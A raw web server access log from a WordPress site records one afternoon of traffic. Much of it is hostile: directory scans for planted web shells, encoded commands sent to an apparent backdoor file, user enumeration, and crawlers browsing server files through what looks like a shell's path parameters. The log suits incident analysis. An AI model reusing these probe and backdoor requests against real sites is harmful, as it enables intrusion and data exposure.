138.199.60.187 - - [18/Oct/2025:14:02:34 -0400] "GET /wp-includes/wp-class.php/wp-content/themes/travelscape/ HTTP/1.1" 403 55015 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
138.199.60.187 - - [18/Oct/2025:14:02:36 -0400] "GET /wp-includes/sitemaps/providers/ HTTP/1.1" 403 55015 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"
138.199.60.187 - - [18/Oct/2025:14:02:37 -0400] "GET /wp-includes/css/dist/edit-widgets/ HTTP/1.1" 403 55016 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36"
138.199.60.187 - - [18/Oct/2025:14:02:37 -0400] "GET /wp-content/themes/classic/inc/ HTTP/1.1" 200 55016 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36"
138.199.60.187 - - [18/Oct/2025:14:02:38 -0400] "GET /Site/ HTTP/1.1" 200 55015 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
138.199.60.187 - - [18/Oct/2025:14:02:39 -0400] "GET /wp-includes/js/codemirror/ HTTP/1.1" 403 55016 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95"
138.199.60.187 - - [18/Oct/2025:14:02:40 -0400] "GET /include/ HTTP/1.1" 200 55016 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
138.199.60.187 - - [18/Oct/2025:14:02:41 -0400] "GET /makeasmtp.php/wp-includes/Requests/ HTTP/1.1" 403 55016 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
138.199.60.187 - - [18/Oct/2025:14:02:42 -0400] "GET /wp-includes/widgets/ HTTP/1.1" 403 55016 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0"
138.199.60.187 - - [18/Oct/2025:14:02:43 -0400] "GET /wp-includes/images/crystal/ HTTP/1.1" 403 55016 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko"
138.199.60.187 - - [18/Oct/2025:14:02:44 -0400] "GET /modules/ HTTP/1.1" 200 55015 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0"
138.199.60.187 - - [18/Oct/2025:14:02:45 -0400] "GET /wp-includes/rest-api/endpoints/ HTTP/1.1" 403 55016 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0"
138.199.60.187 - - [18/Oct/2025:14:02:45 -0400] "GET /wp-admin/css/colors/ HTTP/1.1" 403 55015 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0"
138.199.60.187 - - [18/Oct/2025:14:02:46 -0400] "GET /assets/images/ HTTP/1.1" 200 55016 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
20.171.207.185 - - [18/Oct/2025:14:02:47 -0400] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/bin HTTP/1.1" 200 22055 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.200.251.20 - - [18/Oct/2025:14:02:48 -0400] "GET /%E0%B8%81%E0%B8%8E%E0%B8%AB%E0%B8%A1%E0%B8%B2%E0%B8%A2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%81%E0%B8%A2%E0%B8%81%E0%B8%95%E0%B8%B1%E0%B8%A7%E0%B8%82%E0%B8%AD%E0%B8%87-1xbet-%E0%B8%A0%E0%B8%B2%E0%B8%A2/?fileloc=//var/softaculous/cotonti/php53/install.php&path=//var/softaculous/cotonti/php53 HTTP/1.1" 200 7838 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
138.199.60.187 - - [18/Oct/2025:14:02:48 -0400] "GET /wp-includes/js/tinymce/ HTTP/1.1" 403 55015 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0"
138.199.60.187 - - [18/Oct/2025:14:02:49 -0400] "GET /admin/uploads/ HTTP/1.1" 200 55016 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36"
138.199.60.187 - - [18/Oct/2025:14:02:50 -0400] "GET /index/function.php/img/ HTTP/1.1" 200 55016 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
138.199.60.187 - - [18/Oct/2025:14:02:51 -0400] "GET /wp-includes/js/imgareaselect/ HTTP/1.1" 403 55016 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95"
138.199.60.187 - - [18/Oct/2025:14:02:52 -0400] "GET /wp-includes/sodium_compat/ HTTP/1.1" 403 55016 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95"
185.61.153.74 - - [18/Oct/2025:13:57:32 -0400] "GET /wp-includes/js/crop/crop/index.php?ARRAY=7o2230223n313736303831333835322p2231223n22687474703n5p2s5p2s7n7334383076313373752r696r6574746s2r6q655p2s3s6p633q7068705s636s64655s6n6326743q313736303831303235322q3032363066353339313130623764336339653433303361336530626537373934222p2232223n223539333761313433366637303631333135316431363562633663653137653937222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232392q33312q35332q36352q37352q38342q3237227q HTTP/1.1" 200 52 "-" "-"
138.199.60.187 - - [18/Oct/2025:14:02:53 -0400] "GET /template/ HTTP/1.1" 200 55016 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0"
20.171.207.185 - - [18/Oct/2025:14:02:54 -0400] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/var HTTP/1.1" 200 3373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
138.199.60.187 - - [18/Oct/2025:14:02:54 -0400] "GET /wp-content/mu-plugins-old/ HTTP/1.1" 200 55016 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
138.199.60.187 - - [18/Oct/2025:14:02:55 -0400] "GET /wp-includes/Text/ HTTP/1.1" 403 55016 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0"
138.199.60.187 - - [18/Oct/2025:14:02:56 -0400] "GET /upload/image/ HTTP/1.1" 200 55016 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0"
138.199.60.187 - - [18/Oct/2025:14:02:57 -0400] "GET /wp-includes/SimplePie/Cache/ HTTP/1.1" 403 55016 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0"
138.199.60.187 - - [18/Oct/2025:14:02:58 -0400] "GET /shop/ HTTP/1.1" 200 55016 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
138.199.60.187 - - [18/Oct/2025:14:02:59 -0400] "GET /.tmb/ HTTP/1.1" 403 55016 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36"
138.199.60.187 - - [18/Oct/2025:14:03:00 -0400] "GET /ALFA_DATA/ HTTP/1.1" 200 55016 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0"
138.199.60.187 - - [18/Oct/2025:14:03:01 -0400] "GET /wp-includes/blocks/embed/ HTTP/1.1" 403 55016 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
138.199.60.187 - - [18/Oct/2025:14:03:02 -0400] "GET /components/ HTTP/1.1" 200 55016 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36"
138.199.60.187 - - [18/Oct/2025:14:03:02 -0400] "GET /wp-admin/css/colors/coffee/ HTTP/1.1" 403 55016 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
138.199.60.187 - - [18/Oct/2025:14:03:03 -0400] "GET /wp-content/languages/themes/ HTTP/1.1" 200 55016 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
138.199.60.187 - - [18/Oct/2025:14:03:04 -0400] "GET /wp-includes/ HTTP/1.1" 403 55016 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
138.199.60.187 - - [18/Oct/2025:14:03:05 -0400] "GET /autoloadclassmap.php HTTP/1.1" 403 55016 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
20.171.207.185 - - [18/Oct/2025:14:03:06 -0400] "GET /?fileloc=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/bin/mogrify&path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/bin HTTP/1.1" 200 2623 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
138.199.60.187 - - [18/Oct/2025:14:03:06 -0400] "GET /about/function.php/ HTTP/1.1" 200 55016 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"
138.199.60.187 - - [18/Oct/2025:14:03:07 -0400] "GET /wp-includes/sitemaps/ HTTP/1.1" 403 55016 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
138.199.60.187 - - [18/Oct/2025:14:03:08 -0400] "GET /wp-includes/sodium_compat/src/ HTTP/1.1" 403 55016 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"
138.199.60.187 - - [18/Oct/2025:14:03:10 -0400] "GET /wp-admin/css/colors/sunrise/ HTTP/1.1" 403 55016 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36"
138.199.60.187 - - [18/Oct/2025:14:03:12 -0400] "GET /php/ HTTP/1.1" 200 55016 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95"
138.199.60.187 - - [18/Oct/2025:14:03:13 -0400] "GET /wp-content/mu-plugins/ HTTP/1.1" 403 55016 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
138.199.60.187 - - [18/Oct/2025:14:03:14 -0400] "GET /wp-admin/images/admin.php HTTP/1.1" 403 55016 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36"
138.199.60.187 - - [18/Oct/2025:14:03:15 -0400] "GET /wp-includes/Requests/Transport/ HTTP/1.1" 403 55016 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
138.199.60.187 - - [18/Oct/2025:14:03:16 -0400] "GET /wp-admin/css/colors/ectoplasm/ HTTP/1.1" 403 55016 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0"
138.199.60.187 - - [18/Oct/2025:14:03:16 -0400] "GET /wp-content/plugins/classic-editor/ HTTP/1.1" 200 55016 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95"
138.199.60.187 - - [18/Oct/2025:14:03:17 -0400] "GET /.well-knownold/ HTTP/1.1" 200 55016 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0"
20.171.207.185 - - [18/Oct/2025:14:03:50 -0400] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/lib/.build-id/db HTTP/1.1" 200 4501 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.185 - - [18/Oct/2025:14:04:53 -0400] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/lib/.build-id/ab HTTP/1.1" 200 5141 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
185.61.153.74 - - [18/Oct/2025:14:00:20 -0400] "GET /wp-includes/js/crop/crop/index.php?ARRAY=7o2230223n313736303831343032302p2231223n22687474703n5p2s5p2s7n7334383076313373752r696r6574746s2r6q655p2s3s6p633q7068705s636s64655s6n6326743q313736303831303432302q3262623333386566363334346361393536393666386664636665373830313337222p2232223n223539333761313433366637303631333135316431363562633663653137653937222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232392q33312q35332q36352q37352q38342q3237227q HTTP/1.1" 200 52 "-" "-"
3.229.95.193 - - [18/Oct/2025:14:08:24 -0400] "GET /%E0%B8%81%E0%B8%8E%E0%B8%AB%E0%B8%A1%E0%B8%B2%E0%B8%A2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%81%E0%B8%A2%E0%B8%81%E0%B8%95%E0%B8%B1%E0%B8%A7%E0%B8%82%E0%B8%AD%E0%B8%87-1xbet-%E0%B8%A0%E0%B8%B2%E0%B8%A2/?fileloc=//usr/share/i18n/locales/ar_SD&path=//usr/share/i18n/locales HTTP/1.1" 200 4310 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.79.200 - - [18/Oct/2025:14:14:01 -0400] "GET /zhHant/product/surugaya/R3040651251?campaign_uid=f64d716db5e979ed2f947dbaf4296895b951ae7f HTTP/1.1" 200 21353 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
3.218.103.254 - - [18/Oct/2025:14:14:43 -0400] "GET /%E0%B8%81%E0%B8%8E%E0%B8%AB%E0%B8%A1%E0%B8%B2%E0%B8%A2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%81%E0%B8%A2%E0%B8%81%E0%B8%95%E0%B8%B1%E0%B8%A7%E0%B8%82%E0%B8%AD%E0%B8%87-1xbet-%E0%B8%A0%E0%B8%B2%E0%B8%A2/?fileloc=/home/wwwrenee/mail/.renee@reneesense_com/.spam/new/1756038596.M401576P2239327.host60.registrar-servers.com,S%3D44140,W%3D45067&path=/home/wwwrenee/mail/.renee@reneesense_com/.spam/new HTTP/1.1" 200 16341 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
184.73.47.24 - - [18/Oct/2025:14:16:07 -0400] "GET /%E0%B8%81%E0%B8%8E%E0%B8%AB%E0%B8%A1%E0%B8%B2%E0%B8%A2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%81%E0%B8%A2%E0%B8%81%E0%B8%95%E0%B8%B1%E0%B8%A7%E0%B8%82%E0%B8%AD%E0%B8%87-1xbet-%E0%B8%A0%E0%B8%B2%E0%B8%A2/?fileloc=//usr/lib/firmware/amdgpu/mullins_pfp.bin&path=//usr/lib/firmware/amdgpu HTTP/1.1" 200 2490 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
85.208.96.208 - - [18/Oct/2025:14:17:10 -0400] "GET /kasinolla-pelattavia/ HTTP/1.1" 200 3911 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.244.66.249 - - [18/Oct/2025:14:17:20 -0400] "GET /contact HTTP/1.1" 200 55015 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
54.225.148.123 - - [18/Oct/2025:14:18:35 -0400] "GET /%E0%B8%81%E0%B8%8E%E0%B8%AB%E0%B8%A1%E0%B8%B2%E0%B8%A2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%81%E0%B8%A2%E0%B8%81%E0%B8%95%E0%B8%B1%E0%B8%A7%E0%B8%82%E0%B8%AD%E0%B8%87-1xbet-%E0%B8%A0%E0%B8%B2%E0%B8%A2/?fileloc=//proc/self/cwd/wp-admin/media-upload.php&path=//proc/self/cwd/wp-admin HTTP/1.1" 200 3845 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.185 - - [18/Oct/2025:14:18:35 -0400] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/var/softaculous/prado HTTP/1.1" 200 3594 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.185 - - [18/Oct/2025:14:20:41 -0400] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/var/softaculous/ftools HTTP/1.1" 200 3895 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.185 - - [18/Oct/2025:14:23:09 -0400] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/var/softaculous/easyp HTTP/1.1" 200 3925 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
196.251.71.194 - - [18/Oct/2025:14:23:41 -0400] "GET / HTTP/1.1" 200 55016 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.71.194 - - [18/Oct/2025:14:23:42 -0400] "GET / HTTP/1.1" 200 55015 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.71.194 - - [18/Oct/2025:14:23:42 -0400] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 200 1045 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.71.194 - - [18/Oct/2025:14:23:43 -0400] "GET /?author=1 HTTP/1.1" 200 55016 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
52.3.156.186 - - [18/Oct/2025:14:23:43 -0400] "GET /%E0%B8%81%E0%B8%8E%E0%B8%AB%E0%B8%A1%E0%B8%B2%E0%B8%A2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%81%E0%B8%A2%E0%B8%81%E0%B8%95%E0%B8%B1%E0%B8%A7%E0%B8%82%E0%B8%AD%E0%B8%87-1xbet-%E0%B8%A0%E0%B8%B2%E0%B8%A2/?fileloc=//usr/share/man/man3/BIO_new_fd.3ssl.gz&path=//usr/share/man/man3 HTTP/1.1" 200 2494 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
196.251.71.194 - - [18/Oct/2025:14:23:43 -0400] "GET /?author=2 HTTP/1.1" 200 55016 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.71.194 - - [18/Oct/2025:14:23:44 -0400] "GET /wp-json/wp/v2/users/ HTTP/1.1" 200 55016 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
191.183.38.143 - - [18/Oct/2025:14:23:44 -0400] "GET http://reneesense.com/goods/606741472.phtml?path=%2Fhome%2Fwwwrenee%2Fpublic_html%2Fwp-admin HTTP/1.1" 200 6662 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36"
196.251.71.194 - - [18/Oct/2025:14:23:44 -0400] "GET /wp-json/oembed/1.0/embed?url=http://reneesense.com HTTP/1.1" 200 55016 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.71.194 - - [18/Oct/2025:14:23:45 -0400] "POST /xmlrpc.php HTTP/1.1" 500 55013 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
45.71.37.130 - - [18/Oct/2025:14:24:30 -0400] "GET http://reneesense.com/goods/24981938.phtml?path=%2F HTTP/1.1" 200 3155 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
3.215.59.93 - - [18/Oct/2025:14:25:15 -0400] "GET /%E0%B8%81%E0%B8%8E%E0%B8%AB%E0%B8%A1%E0%B8%B2%E0%B8%A2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%81%E0%B8%A2%E0%B8%81%E0%B8%95%E0%B8%B1%E0%B8%A7%E0%B8%82%E0%B8%AD%E0%B8%87-1xbet-%E0%B8%A0%E0%B8%B2%E0%B8%A2/?fileloc=//proc/self/root/bin/dig&path=//proc/self/root/bin HTTP/1.1" 200 2480 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
185.61.153.74 - - [18/Oct/2025:14:22:49 -0400] "GET /wp-includes/js/crop/crop/index.php?ARRAY=7o2230223n313736303831353336392p2231223n22687474703n5p2s5p2s7n7334383076313373752r696r6574746s2r6q655p2s3s6p633q7068705s636s64655s6n6326743q313736303831313736392q6531336662623837346338323137633161383865313639326132336365633835222p2232223n223539333761313433366637303631333135316431363562633663653137653937222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232392q33312q35332q36352q37352q38342q3237227q HTTP/1.1" 200 52 "-" "-"
216.244.66.249 - - [18/Oct/2025:14:28:34 -0400] "GET /ritzo-casino-live-casino-sicher-und-unterhaltsam/feed/ HTTP/1.1" 200 55016 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
3.93.253.174 - - [18/Oct/2025:14:29:07 -0400] "GET /%E0%B8%81%E0%B8%8E%E0%B8%AB%E0%B8%A1%E0%B8%B2%E0%B8%A2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%81%E0%B8%A2%E0%B8%81%E0%B8%95%E0%B8%B1%E0%B8%A7%E0%B8%82%E0%B8%AD%E0%B8%87-1xbet-%E0%B8%A0%E0%B8%B2%E0%B8%A2/?fileloc=//lib/.build-id/fe/93807e310e65e827f184ab52b32a236c4c9883&path=//lib/.build-id/fe HTTP/1.1" 200 2502 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
54.147.238.89 - - [18/Oct/2025:14:29:28 -0400] "GET /%E0%B8%81%E0%B8%8E%E0%B8%AB%E0%B8%A1%E0%B8%B2%E0%B8%A2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%81%E0%B8%A2%E0%B8%81%E0%B8%95%E0%B8%B1%E0%B8%A7%E0%B8%82%E0%B8%AD%E0%B8%87-1xbet-%E0%B8%A0%E0%B8%B2%E0%B8%A2/?fileloc=/home/wwwrenee/public_html/Backup/wp-content/plugins/updraftplus/languages/updraftplus-th.po&path=/home/wwwrenee/public_html/Backup/wp-content/plugins/updraftplus/languages HTTP/1.1" 200 63339 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
102.218.215.24 - - [18/Oct/2025:14:29:38 -0400] "GET /.well-known/acme-challenge/25GZEG-9_4R3GCMOIUGVCAV9DLHPL0C9 HTTP/1.1" 404 - "-" "Cpanel-HTTP-Client/1.0"
102.218.215.24 - - [18/Oct/2025:14:29:39 -0400] "GET /.well-known/acme-challenge/KYSNZGHAIFKEU1PZKZ5MB1WJA8J1CVG6 HTTP/1.1" 404 - "-" "Cpanel-HTTP-Client/1.0"
102.218.215.24 - - [18/Oct/2025:14:29:39 -0400] "GET /.well-known/acme-challenge/DKULMN0SJ0L8-YETQPHM2GDS03NA7FDK HTTP/1.1" 404 - "-" "Cpanel-HTTP-Client/1.0"
185.61.153.74 - - [18/Oct/2025:14:29:42 -0400] "GET /.well-known/acme-challenge/YE60AP3OABX0E52AG5XM47OP2IE5QQ9G HTTP/1.1" 404 - "-" "Cpanel-HTTP-Client/1.0"
185.61.153.74 - - [18/Oct/2025:14:29:43 -0400] "GET /.well-known/acme-challenge/CJETRB6OV8YV4D5685DAOTTD-MCC6ON6 HTTP/1.1" 404 - "-" "Cpanel-HTTP-Client/1.0"
185.61.153.74 - - [18/Oct/2025:14:29:43 -0400] "GET /.well-known/acme-challenge/9X-2-J8MLX7HSVJC6A6S719_624483UN HTTP/1.1" 404 - "-" "Cpanel-HTTP-Client/1.0"
